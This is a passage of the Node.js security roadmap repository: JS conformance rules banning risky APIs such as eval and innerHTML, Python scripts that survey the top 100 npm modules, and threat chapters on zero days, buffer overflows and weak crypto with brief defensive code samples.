cat /tmp/mds/*.md > /tmp/mds/summary
```
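The summary sits between the `<!-- Begin generated summary -->` and `<!-- End generated summary -->` comments in this file. A minimal sketch of splicing a freshly generated summary into place, where `splice_summary` is a hypothetical helper given the text of `experiments.md` and the text of `/tmp/mds/summary`:

```python
BEGIN = '<!-- Begin generated summary -->'
END = '<!-- End generated summary -->'


def splice_summary(document, summary):
    """Replaces the text between the first BEGIN marker and the END after it."""
    start = document.index(BEGIN) + len(BEGIN)
    end = document.index(END, start)  # raises ValueError if a marker is missing
    return document[:start] + '\n\n' + summary.strip() + '\n\n' + document[end:]
```

Searching for END only after BEGIN keeps the markers paired even if the summary text happens to mention them later in the file.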

[code]: https://github.com/google/node-sec-roadmap/tree/master/appendix
[top100]: https://www.npmjs.com/browse/depended


================================================
FILE: appendix/jsconf/conformance_proto.textproto
================================================
# Copyright 2014 The Closure Compiler Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# This file contains example JS conformance configurations for various problems
# with JavaScript. Since each project may want to opt-in to different rules, and
# each project may need its own specific whitelist, the examples in this file
# are meant to be copied to a project specific conformance_proto.textproto file.

requirement: {
  type: BANNED_NAME
  error_message: 'eval is not allowed'

  value: 'eval'

  whitelist: 'javascript/closure/base.js'
  whitelist: 'javascript/closure/json/json.js'
}

requirement: {
  rule_id: 'closure:stringFunctionDefinition'
  type: RESTRICTED_NAME_CALL

  value: 'Function:function()'
  value: 'setTimeout:function(string, ...?)'
  value: 'setImmediate:function(string, ...?)'
  value: 'setInterval:function(string, ...?)'
  value: 'requestAnimationFrame:function(string, ...?)'

  error_message: 'Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
}

requirement: {
  rule_id: 'closure:windowStringFunctionDefinition'
  type: RESTRICTED_METHOD_CALL

  value: 'Window.prototype.setTimeout:function(string, ...?)'
  value: 'Window.prototype.setImmediate:function(string, ...?)'
  value: 'Window.prototype.setInterval:function(string, ...?)'
  value: 'Window.prototype.requestAnimationFrame:function(string, ...?)'

  error_message: 'window.setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
}

requirement: {
  type: BANNED_PROPERTY
  error_message: 'Arguments.prototype.callee'

  value: 'Arguments.prototype.callee'

  whitelist: 'javascript/closure/base.js'  # goog.base uses arguments.callee
  whitelist: 'javascript/closure/debug/'  # legacy stack trace support, etc
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to Element.prototype.innerHTML is not allowed'

  value: 'Object.innerHTML'

  # Safe wrapper for this property.
  whitelist: 'javascript/closure/dom/safe.js'

  # Safely used in goog.string.unescapeEntitiesUsingDom_; the string assigned to
  # innerHTML is a single HTML entity.
  whitelist: 'javascript/closure/string/string.js'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to Element.prototype.outerHTML is not allowed'

  value: 'Object.outerHTML'

  # Safe wrapper for this property.
  whitelist: 'javascript/closure/dom/safe.js'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to Location.prototype.href is not allowed'

  value: 'Location.prototype.href'

  # Safe wrapper for this property.
  whitelist: 'javascript/closure/dom/safe.js'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to location is not allowed'

  value: 'Window.prototype.location'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Assignment to .href property or src'

  # Types with .href properties that do not extend from Element.
#  value: 'StyleSheet.prototype.href'
#  value: 'CSSImportRule.prototype.href'

  # All other types extend from Element.
#  value: 'Element.prototype.href'
  value: 'Object.href'
  value: 'Object.src'

  # Safe wrapper for this property.
  whitelist: 'javascript/closure/dom/safe.js'
}

requirement: {
  rule_id: 'setAttribute URL'
  type: BANNED_CODE_PATTERN
  error_message: 'Assigning a value to a dangerous property via setAttribute is forbidden'
  value:
      '/**\n'
      ' * @param {*} element\n'
      ' * @param {?} value\n'
      ' */\n'
      'function template(element, value) {'
      '  element.setAttribute(\'src\', value);'
      '}'
  value:
      '/**\n'
      ' * @param {*} element\n'
      ' * @param {?} value\n'
      ' */\n'
      'function template(element, value) {\n'
      '  element.setAttribute(\'href\', value);\n'
      '}'
}

requirement: {
  type: BANNED_PROPERTY_WRITE
  error_message: 'Use of document.domain is not allowed'

  value: 'Document.prototype.domain'
}


================================================
FILE: appendix/jsconf/experiment.py
================================================
#!/usr/bin/python

"""
Runs JSConformance on each of the top 100 modules and collates the results.
"""

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import json
import os.path
import py_common.npm
import re
import shutil
import subprocess
import sys


_error_re = re.compile(r'(?m)^\S+: ERROR - ((?![.]\s)[^\r\n]*)')
# Patterns that can be used to group error messages by glossing over
# any content not in a capturing group.
_simplifier_res = (
    re.compile(r'^(required ").*?(" namespace not provided yet)'),
    re.compile(r'^(type syntax is only supported in ES6 typed mode: ).*'),
    re.compile(r'^(Illegal redeclared variable: ).*'),
    re.compile(r'^(Parse error[.]).*'),
)


def run_jsconf(node_modules, module_name, externs):
    """
    Runs JSConformance on the given module's source files.
    """
    srcs = py_common.npm.js_srcs_almost_worst_case(
        node_modules, module_name,
        module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))
    if not srcs:
        raise Exception(module_name + ' has no srcs')
    args = [
        'java',
        '-jar',
        os.path.join(
            os.path.dirname(node_modules),
            'tools',
            'closure-compiler-latest',
            'closure-compiler.jar'),
        '--process_common_js_modules',
        '--checks-only',
        '--third_party=true',
        '--module_resolution=NODE',
        '--js_module_root=%s' % os.path.realpath(node_modules),
        '--jscomp_error=conformanceViolations',
        '--conformance_configs',
        os.path.join(
            os.path.dirname(node_modules),
            'jsconf',
            'conformance_proto.textproto'),
    ]
    for (_, js_file) in srcs:
        args += ['--js', os.path.realpath(js_file)]
    for js_file in sorted(externs):
        args += ['--externs', js_file]
    #print >>sys.stderr, len(' '.join(args))
    if len(' '.join(args)) >= 240000:  # `getconf ARG_MAX` for Mac OSX
        return ['Argument list too long']
    process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    content = process.stdout.read()
    retcode = process.wait()
    violations = []
    if retcode == 0:
        violations.append('Passed')
    for match in _error_re.finditer(content):
        violation = match.group(1)
        for simpler in _simplifier_res:
            simple_match = simpler.match(violation)
            if simple_match:
                violation = '...'.join(simple_match.groups())
        violations.append(violation)
    return violations

if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    externs = set()
    for externs_file in py_common.npm.js_files_under(
            os.path.join(os.path.dirname(sys.argv[0]), 'externs')):
        if os.path.basename(os.path.dirname(externs_file)) == 'tests':
            continue
        externs.add(externs_file)

    # Maps rule identifiers to sets of offending modules.
    rule_violations = {}


    module_count = 0
    for module_name in top100:
        violations = run_jsconf(node_modules, module_name, externs)
        if ('Parse error.' in violations
            or 'Argument list too long' in violations):
            pass
        else:
            module_count += 1
        for v in violations:
            if v in rule_violations:
                vmap = rule_violations[v]
            else:
                vmap = rule_violations[v] = {}
            vmap[module_name] = vmap.get(module_name, 0) + 1

    # TODO: exclude Parse error and Argument list too long

    print "## JS Conformance {#jsconf}"
    print ""
    print "JS Conformance identifies uses of risky APIs."
    print ""
    print "Some modules did not parse.  This may be due to TypeScript."
    print "JSCompiler doesn't deal well with mixed JavaScript and TypeScript"
    print "inputs."
    print ""
    print "If a module is both in the top 100 and is a dependency of another"
    print "module in the top 100, then it will be multiply counted."
    print ""
    print "Out of %d modules that parsed:" % module_count
    print ""
    print "| Violation | Count of Modules | Total Count | Quartiles |"
    print "| --------- | ---------------- | ----------- | --------- |"
    for (v, vmap) in sorted(rule_violations.items()):
        count = 0
        total_count = 0
        values = vmap.values()
        for n in values:
            count += 1
            total_count += n
        values += [0] * (module_count - count)
        values.sort()
        quartiles = '%d / %d / %d' % (
            values[len(values) >> 2],
            values[len(values) >> 1],
            values[(len(values) * 3) >> 2],
        )
        print "| `%s` | %d | %d | %s |" % (
            v, count, total_count, quartiles)


================================================
FILE: appendix/lazy-load/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Looks for lazy loading patterns.

Patterns to identify include

  * { ... require(...)

"""

import json
import os.path
import py_common.npm
import re
import shutil
import sys


lazy_load_pattern = re.compile(
    r'[{][^}]*(?<![_$\w.])require\s*\(')

def find_lazy_load(node_modules, module_name):
    return py_common.npm.js_srcs_matching(
        node_modules, module_name, lazy_load_pattern,
        module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))


if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    uses = 0
    total_count = 0
    has_lazy_load = {}
    for module_name in top100:
        js_srcs = find_lazy_load(node_modules, module_name)
        has_lazy_load[module_name] = js_srcs
        if len(js_srcs):
            uses += 1
        total_count += 1

    print (
"""
## Lazy loads {#lazy_load}

Lazy loading can complicate code bundling if care is not taken.

%d of %d = %1.02f%% contain a use of require inside a `{...}` block.
""" % (uses, total_count, (100.0 * uses) / total_count))


================================================
FILE: appendix/py_common/__init__.py
================================================
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


================================================
FILE: appendix/py_common/npm.py
================================================
"""
Utilities for mucking with NPM packages
"""

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import json
import os
import os.path
import re
import subprocess
import sys
import tempfile

import jslex.jslex

def install_packages(*package):
    """
    Creates a temporary node_modules directory with the given packages
    and returns it.
    """
    tmp_dir = tempfile.mkdtemp()
    tmp_node_modules_dir = os.path.join(tmp_dir, 'node_modules')
    os.mkdir(tmp_node_modules_dir)
    subprocess.check_call([
        'npm', 'install', '--ignore-scripts', '--only=prod',
        '-g', '--prefix', tmp_node_modules_dir,
        '--'] + list(package))
    return tmp_node_modules_dir


def for_each_npm_package(node_modules_dir, f):
    """
    Calls f with each package directory path.

    Returns an object with the result of each call keyed by
    package name.

    For a dir tree like
       node_modules
         foo
           package.json
           ...
         bar
           package.json
           ...
         baz
           package.json
           ...
         .bin
           ...
    returns
        {
          'bar': f('node_modules/bar'),
          'baz': f('node_modules/baz'),
          'foo': f('node_modules/foo')
        }
    """
    result = {}
    for fname in os.listdir(node_modules_dir):
        if fname not in ('.', '..'):
            if os.path.isfile(os.path.join(node_modules_dir, fname, 'package.json')):
                result[fname] = f(os.path.join(node_modules_dir, fname))
    return result

def ignore_tools_that_can_run_early(module_name):
    """
    A module filter that filters out dependencies on modules that
    can be run during the bundling/validation process so are not strictly
    necessary at runtime.
    """
    return lambda mn: mn == module_name or not (
        mn.startswith('babel')
        or mn.startswith('eslint'))

_REQUIRE_RE = re.compile(r'(?<![\w.])require\s*[(]([^\)]*)')
_REL_REQUIRE_RE = re.compile(r'^[.][.]?/')

def js_srcs_almost_worst_case(node_modules, module_name, module_filter=None):
    """
    The set of JS & TS source files required by a module
    including those required by prod dependencies.

    This does not take into account TS imports.

    This is not entirely conservative.
    We make an optimistic assumption that a dynamic load,
    a require(x) where x is not a string literal, only
    loads files from the same module.
    This is not true, e.g. when babel-core loads extension
    modules.
    These cross-module loads need not only load from prod
    dependencies, so assuming otherwise would not actually
    make us conservative either.

    Returns [('module', '/abs/path/to/src.js'), ...]
    """
    if module_filter is None:
        module_filter = lambda _: True
    js_files = set()
    unprocessed = [module_name]
    visited = set()
    while unprocessed:
        up_module_name = unprocessed.pop()
        if up_module_name in visited: continue
        visited.add(up_module_name)
        if not module_filter(up_module_name): continue
        rq = None
        try:
            rq = requires(node_modules, up_module_name)
        except:
            import traceback
            traceback.print_exc()
        if rq is not None and rq['upper']:
            js_files.update([(up_module_name, src) for src in rq['srcs']])
            unprocessed += rq['deps']
        else:
            #print >>sys.stderr, "Falling back to worst-case for %s required by %s" % (
            #    up_module_name, module_name)
            js_files.update([(up_module_name, src) for src in
                             js_files_under(
                                 os.path.join(node_modules, up_module_name))
                             if not probable_non_prod_file(src)])
            package_json = None
            try:
                package_json = json.loads(
                    file(os.path.join(node_modules, up_module_name, 'package.json'), 'r')
                    .read())
            except:
                print >>sys.stderr, "Undeclared dependency %s" % up_module_name
            if package_json is not None:
                unprocessed += package_json.get('dependencies', {}).keys()
    return tuple(sorted(js_files))

def requires(node_modules, module_name):
    """
    Follows require() calls to bound the set of JS files in a module.

    Returns {
      'srcs': [...],  # main.js and same-module files required thereof
      'deps': [...],  # required modules
      'upper': True,  # True when srcs and deps accounts for all require calls.
    }
    """
    module_root = os.path.join(node_modules, module_name)
    package_json = json.loads(
        file(os.path.join(module_root, 'package.json')).read())
    main_files = package_json.get('main', None)
    if type(main_files) in (str, unicode):
        main_files = (main_files,)
    if not main_files:
        return { 'srcs': (), 'deps': (), 'upper': False }
    srcs = set()
    deps = set()
    upper = True
    visited = set()
    unprocessed = [os.path.join(module_root, rp) for rp in main_files]
    while unprocessed:
        src = os.path.realpath(unprocessed.pop())
        if src in visited: continue
        visited.add(src)
        if os.path.isdir(src):
            for f in js_files_under(src):
                unprocessed.append(f)
        else:
            srcs.add(src)
            content = ''
            try:
                content = file(src, 'r').read()
            except:
                upper = False
            for match in _REQUIRE_RE.finditer(content):
                arg = match.group(1).strip()
                if not arg:
                    pass  # Zero arguments
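                elif len(arg) > 2 and arg[0] in ('"', "'") and arg[0] == arg[-1]:
                    try:
                        arg = json.loads('"%s"' % arg[1:-1])
                    except:
                        #print >>sys.stderr, "Cannot parse require argument %s" % arg
                        upper = False
                        continue
                    if _REL_REQUIRE_RE.match(arg):
                        # Resolve relative to the requiring file, not the CWD.
                        dep_path = os.path.join(os.path.dirname(src), arg)
                        if not os.path.exists(dep_path) and not dep_path.endswith('.js'):
                            dep_path += '.js'
                        unprocessed.append(dep_path)
                    else:
                        deps.add(arg)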
                else:
                    upper = False
    return {
        'srcs': tuple(sorted(srcs)),
        'deps': tuple(sorted(deps)),
        'upper': upper
    }

def js_files_under(root_dir):
    for dir_path, subdir_list, file_list in os.walk(root_dir):
        for f in file_list:
            if f.endswith('.js') or f.endswith('.ts'):
                yield os.path.join(dir_path, f)

def preprocess_js_content(content):
    """
    Preprocesses JS content to make it easier to operate on.

    All comments are replaced with spaces, and string literal
    content is upper-cased to make it easier to distinguish
    lower-case keywords and identifiers from similar content that
    appears inside a string literal.
    """

    lexer = jslex.jslex.JsLexer()
    canon_tokens = []
    for (tok_type, tok_content) in lexer.lex(content):
        if tok_type in ('comment', 'linecomment'):
            tok_content = ' '
        elif tok_type in ('regex', 'string'):
            tok_content = tok_content.upper()
        canon_tokens.append(tok_content)
    processed_content = ''.join(canon_tokens)

    return processed_content

def js_srcs_matching(node_modules, module_name, pattern, module_filter=None):
    """
    A list of (module, path) srcs reachable from module_name, per
    js_srcs_almost_worst_case, whose preprocessed content matches pattern.
    """

    srcs = js_srcs_almost_worst_case(
        node_modules=node_modules,
        module_name=module_name,
        module_filter=module_filter)

    matching_srcs = []
    for src in srcs:
        (_, path) = src
        canon_content = preprocess_js_content(file(path, 'r').read())
        match = pattern.search(canon_content)
        if match:
            matching_srcs.append(src)
    return matching_srcs

# by visual examination of
# `find node_modules/ -type d | perl -pe 's|/|\n|g' | sort | uniq`
_NON_PROD_PATH = re.compile(
    r'(?i)(?:^|[/\\])(?:tests?|testdata|testing|[.]github|__tests__|demo|examples?|benchmarks?)(?:$|[/\\])')
def probable_non_prod_file(path):
    """
    True if path probably holds non-production content such as tests,
    demos, or benchmarks; used to skip such files when falling back to
    directory scanning.
    """
    return _NON_PROD_PATH.search(path) is not None


================================================
FILE: appendix/test-code/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Looks for test code patterns under node_modules.

Patterns to identify include

  * require('assert')
  * require('chai')
  * require('chai/*')
  * require('mocha')
  * require('should')
  * require('unexpected')

"""

import json
import os.path
import py_common.npm
import re
import shutil
import sys


test_code_pattern = re.compile(
    r'(?m)(?:^|[^.\w])require\s*[(]\s*[\'\"](?:assert|chai|chai/[^\'\"]+|mocha|should|unexpected)[\'\"]')


if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    top100 = [x for x in file(top100_txt).read().split('\n') if x]

    uses = 0
    total_count = 0
    has_test_code = {}
    for module_name in top100:
        module_root = os.path.join(separate_modules, module_name)
        for js_file in py_common.npm.js_files_under(module_root):
            js_content = file(js_file, 'r').read()
            if test_code_pattern.search(js_content):
                uses += 1
                break
        total_count += 1

    print (
"""
## Prod bundle includes test code {#test_code}

Some of the top 100 modules are test code, e.g. mocha, chai.
This measures how many modules, when installed with `--only=prod`,
include test code patterns.

%d of %d = %1.02f%% contain test code patterns
""" % (uses, total_count, (100.0 * uses) / total_count))


================================================
FILE: appendix/top100.txt
================================================
async
babel-core
babel-preset-es2015
babel-runtime
bluebird
body-parser
chalk
cheerio
classnames
coffee-script
colors
commander
debug
express
fs-extra
glob
gulp
gulp-util
jquery
lodash
minimist
mkdirp
moment
prop-types
q
react
react-dom
request
rxjs
through2
underscore
uuid
webpack
winston
yargs
yeoman-generator
@angular/common
@angular/core
aws-sdk
axios
babel-loader
babel-polyfill
chai
co
core-js
css-loader
ejs
ember-cli-babel
eslint
handlebars
inquirer
joi
js-yaml
mocha
mongodb
mongoose
node-uuid
object-assign
optimist
ramda
react-redux
redis
redux
request-promise
rimraf
semver
shelljs
socket.io
superagent
xml2js
yosay
zone.js
@angular/compiler
@angular/forms
@angular/http
@angular/platform-browser
@angular/platform-browser-dynamic
@types/node
angular
autoprefixer
babel-eslint
babel-preset-react
bootstrap
cookie-parser
dotenv
es6-promise
eslint-plugin-react
extend
extract-text-webpack-plugin
file-loader
immutable
jade
jsonwebtoken
marked
mime
morgan
mysql
nan
node-sass
path
promise
react-router
style-loader
typescript
uglify-js
underscore.string
vue
ws


================================================
FILE: appendix/uses-scripts/experiment.py
================================================
#!/usr/bin/python

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Collates how many projects use install scripts.

Per https://docs.npmjs.com/misc/scripts we look for the
following keys under "scripts" in package.json:

  * preinstall
  * install
  * postinstall
"""

import json
import os.path
import py_common.npm
import sys

def uses_scripts(package_root):
    package_json = json.loads(
        file(os.path.join(package_root, 'package.json')).read())
    scripts_obj = package_json.get('scripts', None)
    if scripts_obj is None:
        return False
    for script_type in ('preinstall', 'install', 'postinstall'):
        # TODO: True if empty value
        if script_type in scripts_obj: return True
    return False

if __name__ == '__main__':
    (node_modules, separate_modules, top100_txt) = sys.argv[1:]

    per_package = py_common.npm.for_each_npm_package(
        node_modules, uses_scripts)
    total_count = 0
    script_users = 0
    for uses in per_package.itervalues():
        if uses:
            script_users += 1
        total_count += 1
    print (
"""
## Uses Scripts {#uses_scripts}

Unless steps are taken to prevent it, installation scripts run code on
a developer's workstation with the developer's privileges, including
write access to local repositories.  If this number is small, having
humans review installation scripts before they run might be feasible.

%d of %d = %1.02f%% use installation scripts
""" % (script_users, total_count, (100.0 * script_users) / total_count))


================================================
FILE: book.json.withcomments
================================================
# Comments are stripped
{
    "root": ".",
    "structure": {
        "readme": "cover.md"
    },
    "title": "A Roadmap for Node.js Security",
    "description": "Discusses security and privacy threats to the Node.js community and ways the community might address them.  Assumes a basic familiarity with JS & the Node ecosystem.",
    "author": "Mike Samuel et al",
    "language": "en",
    "gitbook": ">= 3.0.0",
    "plugins": [
        "links",
        "ga"
    ],
    "pluginsConfig": {
        # Google Analytics integration
        "ga": {
            "token": "UA-111883728-1",
            "configuration": {
                "anonymizeIp": true,
                "forceSSL": true
            }
        },
        "links": {
            "links": [
                {
                    # Adds a printer icon at the top.
                    # See styles/website.css for styling.
                    "label": "Printable",
                    # "icon" corresponds to a classname
                    "icon": "print-button",
                    # `make pdf` produces book.json which
                    # needs to be copied into _book/ for
                    # this to work.
                    # TODO: Point to an authoritative version
                    # via absolute URL once published.
                    "url": "/node-sec-roadmap.pdf"
                },
                {
                    "label": "GitHub",
                    "icon": "github-button",
                    "url": "https://github.com/google/node-sec-roadmap"
                }
            ]
        }
    }
}


================================================
FILE: chapter-1/recap.md
================================================
We've discussed the kinds of threats that concern us.

Next we discuss how some Node.js projects mitigate these threats today
and how we can make it easier for more Node.js projects to
consistently mitigate these threats.

Readers may find it useful to refer back to the [threat table][] which
cross-indexes threats and mitigation strategies.

[threat table]: threats.md#threat_table


================================================
FILE: chapter-1/threat-0DY.md
================================================
# Zero Day

When a researcher discloses a new security vulnerability, the clock
starts ticking.  An attacker can compromise a product if they can
weaponize the disclosure before the product team

*  realizes they're vulnerable, and
*  finds a patch to the vulnerable dependency, or rolls their own, and
*  tests the patched release and pushes it into production.

["The Best Defenses Against Zero-day Exploits for Various-sized
Organizations"][sans] notes

> Zero-day exploits are vulnerabilities that have yet to be publicly
> disclosed. These exploits are usually the most difficult to defend
> against because data is generally only available for analysis after
> the attack has completed its course.

> ...

> The research community has broadly classified the defense techniques
> against zero-day exploits as statistical-based, signature-based,
> behavior-based, and hybrid techniques (Kaur & Singh, 2014). The
> primary goal of each of these techniques is to identify the exploit in
> real time or as close to real time as possible and quarantine the
> specific attack to eliminate or minimize the damage caused by the
> attack.

Being able to respond quickly, to limit damage, and to recover is
critical.

That same paper talks at length about *worms*: programs that
compromise a system without explicit direction by a human attacker,
and use the compromise of one system to find other systems to
automatically compromise.

Researchers have found ways ([details][saccone]) in which worms
might propagate throughout `registry.npmjs.org`, and common practices
that might allow a compromise to jump from the module repository to
large numbers of production servers.

If we can structure systems so that compromising one component
does not make it easier to compromise another component, then
we can contain damage due to worms.

If, in a population of components, we can keep susceptibility below a
critical threshold so that worms spend more time searching for targets
than compromising targets, then we can buy time for humans to
understand and respond.
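The threshold idea can be illustrated with a toy branching model.  This
is an assumption-laden sketch, not a measurement: `expectedCompromises`
is a hypothetical helper that supposes each compromised component probes
`probes` others and each probe succeeds with probability
`susceptibility`, ignoring time, network topology, and repeat targets.
When their product `r` is below 1, the expected total number of
compromises levels off near `1 / (1 - r)`; above 1 it grows
exponentially with each generation.

```js
'use strict';

// Toy branching model of worm spread (illustrative assumption only).
// probes:         hosts each compromised host tries to infect
// susceptibility: probability that a single probe succeeds
// generations:    number of rounds of spreading to simulate
function expectedCompromises(probes, susceptibility, generations) {
  // Expected new compromises caused by each compromised host.
  const r = probes * susceptibility;
  let current = 1; // expected hosts compromised in the latest generation
  let total = 1;   // expected hosts compromised so far, including the first
  for (let g = 0; g < generations; g++) {
    current *= r;
    total += current;
  }
  return total;
}

// Below the threshold (r = 0.5) the total levels off near 1 / (1 - r) = 2.
console.log(expectedCompromises(4, 0.125, 50));
// Above it (r = 2) the total roughly doubles each round.
console.log(expectedCompromises(4, 0.5, 10)); // 2047
```

Lowering either factor, fewer reachable targets or fewer susceptible
ones, can push `r` below 1, which is one way to read the goal of keeping
susceptibility below a critical threshold.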

If we can keep a zero day that compromises a population of modules
from causing widespread compromise of a population of production
servers, then we can limit damage to end users.

[sans]: https://www.sans.org/reading-room/whitepapers/bestprac/defenses-zero-day-exploits-various-sized-organizations-35562
[saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf


================================================
FILE: chapter-1/threat-BOF.md
================================================
# Buffer Overflow

A buffer overflow occurs when code fails to check an index into an
array while unpacking input, allowing parts of that input to overwrite
memory locations that other trusted code assumes are inviolable.
A similar technique also allows exfiltrating data like cryptographic keys
when an unchecked limit leads to copying unintended memory locations into
an output.

Buffer overflow vectors in Node.js are:

*  The Node.js runtime and its dependencies, like the JS engine and OpenSSL.
*  [C++ addons][]: third-party modules that include native code, for
   example via N-API (the native API).
*  Child processes.  For example, code may route a request body to an
   [image processing library][imagetragick] that was not
   written with untrusted inputs in mind.

Buffer overflows are common, but we class them as low frequency for
Node.js in particular.  The runtime is highly reviewed compared to the
average C++ backend; C++ addons are a small subset of third-party
modules; and there's no reason to believe that child processes spawned
by Node.js applications are especially risky.
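Ordinary `Buffer` reads and writes in JavaScript are bounds-checked, but
the over-read described at the top of this page has a Node.js analogue:
`Buffer.allocUnsafe()` returns memory that is not zero-filled.  The
sketch below uses a hypothetical `encodeRecord` helper and an assumed
`maxBytes` limit to show two habits: check the limit before copying,
and return only the bytes that were actually written.

```js
'use strict';

// Hypothetical helper: encodes `text` as a 4-byte big-endian byte length
// followed by its UTF-8 bytes.  `maxBytes` is an assumed payload limit.
function encodeRecord(text, maxBytes = 1024) {
  const needed = Buffer.byteLength(text, 'utf8');
  // Check the limit before copying rather than trusting the input.
  if (needed > maxBytes) {
    throw new RangeError(`record of ${needed} bytes exceeds limit of ${maxBytes}`);
  }
  // Buffer.allocUnsafe is fast but NOT zero-filled: it can hold bytes
  // left over from earlier allocations, such as keys or session tokens.
  const buf = Buffer.allocUnsafe(4 + maxBytes);
  const written = buf.write(text, 4, needed, 'utf8');
  buf.writeUInt32BE(written, 0);
  // Return only the initialized prefix.  Returning `buf` itself would
  // copy the uninitialized tail into the output.
  return buf.subarray(0, 4 + written);
}

const record = encodeRecord('hello');
console.log(record.length); // 9
```

Using `Buffer.alloc()`, which zero-fills, trades a little speed for not
having to reason about the uninitialized tail at all.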

[imagetragick]: https://imagetragick.com/
[C++ addons]: https://nodejs.org/api/addons.html#addons_c_addons


================================================
FILE: chapter-1/threat-CRY.md
================================================
# Weak Crypto {#CRY}

Cryptographic primitives are often the only practical way to solve
important classes of problems, but it's easy to make mistakes when using
`crypto.*` APIs.
Failing to identify third-party modules that use crypto (or should be
using crypto), and failing to determine whether they use it properly,
can lead to a false sense of security.
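As one illustration of how subtle these mistakes can be, comparing a
message authentication code with `===` may let an attacker learn how
many leading characters of a forged tag are correct from response
timing.  This sketch uses Node's `crypto.createHmac` and
`crypto.timingSafeEqual`; the `sign`/`verify` helper names and the hex
tag format are assumptions for illustration.

```js
'use strict';
const crypto = require('crypto');

// Hypothetical helpers: tag a message with HMAC-SHA256 and check a tag.
function sign(key, message) {
  return crypto.createHmac('sha256', key).update(message).digest('hex');
}

function verify(key, message, tagHex) {
  const expected = Buffer.from(sign(key, message), 'hex');
  const actual = Buffer.from(String(tagHex), 'hex');
  // timingSafeEqual throws on a length mismatch.  The length of a valid
  // HMAC-SHA256 tag is public, so returning early here leaks no secret.
  if (actual.length !== expected.length) return false;
  // Unlike `===` on strings, which may stop at the first differing
  // character, this compares all bytes regardless of where they differ.
  return crypto.timingSafeEqual(expected, actual);
}

const tag = sign('server-secret', 'user=carol');
console.log(verify('server-secret', 'user=carol', tag)); // true
console.log(verify('server-secret', 'user=admin', tag)); // false
```

Both versions pass the same functional unit tests, which is exactly why
this class of mistake is hard to catch by testing alone.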

["Developer-Resistant Cryptography"][Cairns & Steel] by Cairns & Steel
notes:

> The field of cryptography is inherently difficult. Cryptographic API
> development involves narrowing a large, complex field into a small set
> of usable functions.  Unfortunately, these APIs are often far from
> simple.

> ...

> In 2013, study by Egele et al. revealed even more startling figures
> [1]. In this study, six rules were defined which, if broken, indicated
> the use of insecure protocols. More than 88% of the 11,000 apps
> analyzed broke at least one rule. Of the rule-breaking apps, most
> would break not just one, but multiple rules. Some of these errors
> were attributed to negligence, for example test code included in
> release versions. However, in most cases it appears developers
